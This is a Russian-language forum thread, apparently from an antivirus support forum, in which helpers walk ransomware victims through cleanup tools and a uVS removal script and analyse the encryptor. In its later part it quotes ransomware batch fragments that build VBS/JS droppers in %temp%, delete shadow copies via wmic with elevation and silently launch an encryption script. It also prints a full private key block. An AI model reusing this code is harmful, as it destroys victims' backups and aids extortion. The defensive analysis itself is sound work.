2.удалите все найденное в малваребайт
перегрузите систему
далее,
3.сделайте проверку в АдвКлинере
http://forum.esetnod32.ru/forum9/topic7084/

*****
4.в АдвКлинере, после завершения проверки,
в секции [b]Папки[/b] снимите галки с записей mail.ru, yandex (если есть такие)
остальное удалите по кнопке [b]Очистить[/b]
далее,

5.сделайте проверку в FRST
http://www.cyberforum.ru/viruses-faq/thread1362245.html

добавьте логи сканирования в мбам,
дальше видно будет что делать

[QUOTE]Андрей Савченко написал:
Ключ формируется на локальном компьютере или на сервере злоумышленников?[/QUOTE]
тут вопрос конечно.
вполне возможно, что ключевая пара создается на сервере злоумышленников.
(в этом случае отпадает необходимость в затирании ключей на компе жертвы)
предполагаю, что вот эта инфо в readme.txt, которую они запрашивают, является идентификатором ключа

[QUOTE]Чтобы расшифровать их, Вам необходимо отправить код:
[B]7A3C33E992454A60C54F[/B]|25|2|12
[/QUOTE]
или
[QUOTE]Чтобы расшифровать их, Вам необходимо отправить код:
22F2A3C82C93E5EEC374|0
[/QUOTE]
или
[QUOTE]Чтобы расшифровать их, Вам необходимо отправить код:
4C2674EF43B70B21C3A7|0[/QUOTE]
или
[QUOTE]595B0DA54E6909123123|65|1|1[/QUOTE]

пример приватного ключа для расшифровки документов

[QUOTE]-----BEGIN PRIVATE KEY-----
MIIG/QIBADANBgkqhkiG9w0BAQEFAASCBucwggbjAgEAAoIBgQDEIKfIEM1T­c3Ta
8GrsF14R7RU2cV4qURV8c6sAiaV3aA5r/peJCLmBcNCOoU9bsYjJfW1MxLfm­HtKV
9Ba9khSJ2Q72wRPl+3mE7vA6RlqQBPWDtl7gZQvOpHX2d81BkhQEUZzhLHCG­CYER
Nu5+Xo3932A9vp+6jT8Y7aqvnzu572saAyNsiQSBRwRUKCKmxD57+S23SHdp­7Ds1
CSVVvIjZWcrfDXCXQVY2ico3cZgzNsWIe0ys6X9CEv4fNjDn0iRhbG7BHp0p­WxOP
Fn2KRxApGzkYJHTNRPA4VaeryaoxvR+ajgq9shLiAAp+IJUAPWR2ke9Sg04k­arAM
Q08tZYo3LZrovDQOtebeznH9qWukZKnMq1eY9A06Gpr4+WwBXV7XEQt1+tSv­hfwu
L8WZUyJ6TA6DaGAwJMaF+Bgtgw1aP3QN6ZXZ2xl5rb+qZoN0JyEni7ZX/Yj4­yCBO
VO/PLTm7fg3jADeqXt7zfVkAFgjIoolZjLjajM/qhxKyiJPPuXMCAwEAAQKC­AYBw
mPLaWFMY+ur2mxo3ir7V+c+43uMZ1k1Ikrt05pFZeSL2e0aSRLEDkDob+J4v­3T/T
ta+faDzP35g0wNqhYRFrhnMh1P1QhsxgNjEys5tgnYg6YuQbXcemjiKvKl5r­q6rU
Q+qWF8ZOHXy83lWTtUM9ohWFvT/EgTzdWe0pQHiwqbRKTczzjcJJWfUxP42N­QpNA
53CIjhEIfbgMHcESdNf4OKXQ4s1l+Pu++eJfbFbd6C8FyQvfJXqK+45ratgu­7yQ0
MLtG06OCmPU+olAD3kTokmgNkFujEP2XkQW3qyzru6wtUZH6iH3zMk07aYk4­he6n
G1czArLuMz8ynArBjMeUV9mVaPmro9ykb7Zv0W0jgr/UHXtKf98KZC48BieY­X4zc
1lPJCG3el2hz5fYd8mvVtIQQn6CKiujQBlhuRoty3BwwsX/8AMOnl6v97J+Q­/s0Z
w8+88K+Cy3/4EGRStPIfvXMaXDH7KcXQz7Z9Z9LXanESCYv2sgfWTL+VAvbr­uAkC
gcEA67ayazT2Q/H0FkwaiuOeUAOET8Hkjf+wR1e/pA3LN+ptP5y6nTeMhJ67­aFIM
IPy1dxqQiR1m4+8nd0HgYKhjfy8WlNFblhTdoZ0PgCeNkbHVZJwfDmjVZGPH­+QQP
IdzmYEkC2O2DKbyrAptPtssHP153//IJQTO7ogZPRd/Zbar+Y5f6ge0Qt4Si­r6my
AzEPkRThBG00QMiRYN+xCaeSG/LAzd3vw3Msvmuq6epVT8v9f143IuDc0rSc­unqP
jBN9AoHBANUByZe/p8rrZmLBZqnqMv5uROC2mR+bdyUnX+6iezdon4dXIfRN­zkc5
gLAtXUPSRG1DJAnoSB71Rkj0r7ukw87vMCItKds3FtvMWKzgqTFg5M/TL8Ak­/4Xz
E3kYDxRY8BNQBwoQZP7XTkbFy8yo9R7FUtHYpjZW7EsXgoGuEFmjIPGC0MBY­c23N
c+V1EtSFfUHKB27DZEvuM/RVmOPDlDopLNHAgxZkzqaahQ7JR5tW00p2sm6v­czP8
lAtR5oazrwKBwQCUbwpQBJwIEXd6Cxaz2763+F77ssfwu9EQPCvMbXtJjPCb­HGFP
28k7QpIVkYVdyIWlqS7XiZJfexzJNszLUX7GeqqnsGcSTbV7rmIye7Xkx63v­m3jb
JB0tCMDHCU1WL7tLau7GGFt+jvbJv3AlVhkMSLscjBhT3PYNhBerktli/EkS­AoSY
COd8CaRBJoWZCO4amKFSnkpHeYZDENp1j/asbuQHP/lahU7p4vdQMmbixzyt­VnE2
H5Avh9kifUekGCkCgcBRXW9uIe2sW6MukgXvXeDAw8pXtChlpHMspA/HDhXX­IoXd
ovD7a0Uie9qmcY2wvH8a5Yy8pBf4i2SftafzG4sYXtGaHHpinHaE21f8IY0/­qW19
3YPd98QLnMCRfxkzgo2iMu2dcInDtubVrfSdZuTLLkDmm8VR+H4maQKXGrBw­LRoG
ZxvqfV8KUHK28bORrrQcD1ore0OypXj/GjtetXTHirbuIIVyZmtxxJCTB1vt­AIuR
ZCngkfCFqTO75zsRtU0CgcBKODRX7lBFFiDbbRnjW6R5leHjlrSsu2Q4C8Ck­j/7o
b2ng5HEnERZuZINQfiSfdZu0TRJvAw65le736moe6FJq5zw1fvDVvnN9Ig8y­CPCz
rUg6YuFCTC6WZwap9/p/X8f3UCWRYKAjeh18AcPa3TkSIKAqkuQ4Ar9a280L­Pzl7
3DmgSXw8ZB+lKVGGhd24DhqG649d+YedO7f8+oIzJMtQlm+Iqns5ICe8wDdr­DzQw
PDfEA1Nit7T/yHejsniGrA4=
-----END PRIVATE KEY-----[/QUOTE]

NickM, тестирую в основном на XP, не наблюдал как этот фрагмент отрабатывает на Win7,8

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
[code]

;uVS v3.85.21 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE

delall %SystemDrive%\USERS\КОМПИК\APPDATA\LOCAL\SYSTEMDIR\NETHOST.EXE
;------------------------autoscript---------------------------

chklst
delvir

delref HTTP://ANVIDPA.RU/?UTM_SOURCE=UOUA03&UTM_CONTENT=771B99ED44376525853071176B6BD8­82

deltmp
delnfr
;-------------------------------------------------------------

restart
[/code]
перезагрузка, пишем о старых и новых проблемах.
------------
далее,
сделайте дополнительно быструю проверку системы в малваребайт
http://forum.esetnod32.ru/forum9/topic10688/

а лог зачем?  вы же систему поменяли после шифрования

скорее всего это ctblocker, т.е. без расшифровки на сегодня и завтра.

вот скажем в начале апреля был вариант.

[QUOTE]echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\win.vbs"
echo var cdp="%%TEMP%%\\shdw.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\shdw.js"[/QUOTE]

а это на конец марта

[QUOTE]echo Set objShell = CreateObject^("Shell.Application"^) > "%TEMP%\win.vbs"
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%TEMP%\win.vbs"
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%TEMP%\win.vbs"
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%TEMP%\win.vbs"[/QUOTE]

достаточно давно (месяца два не меньше, если не больше). файл сейчас гляну
а что именно по этому файлу прокомментировать? отключение теневых копий? надо сравнить со старыми вариантами бат-энкодера.
немного позже.

уху, видимо поправили свой бат-энкодер.
теперь процесс шифрования прописан в автозапуск, надо будет посмотреть последние свежие варианты шифратора.
возможно дошифрование того что осталось незашифрованным или восстановленным.
поэтому темп надо зачищать от файлов ВАУЛТ

[QUOTE]C:\Users\0D88~1\AppData\Local\Temp\06dca008.js
Скрипт: Kарантин, Удалить, Удалить через BC Активен Ключ реестра HKEY_USERS, S-1-5-21-3033825225-2200833762-766671363-1146\Software\Microsoft\Windows\CurrentVersion\Run, ffe7c7a0[/QUOTE]

этот файлик 06dca008.js
запускает 280ec63e.cmd
в котором прописано шифрование файлов.
т.е. это как раз [B]дошифрование[/B], потому что после перезагрузки cmd уже не меняется.
------
если этот файлик будет удален, то дошифрование, конечно, не произойдет. нечем шифровать.
[QUOTE]C:\Users\0D88~1\AppData\Local\Temp\svchost.exe[/QUOTE]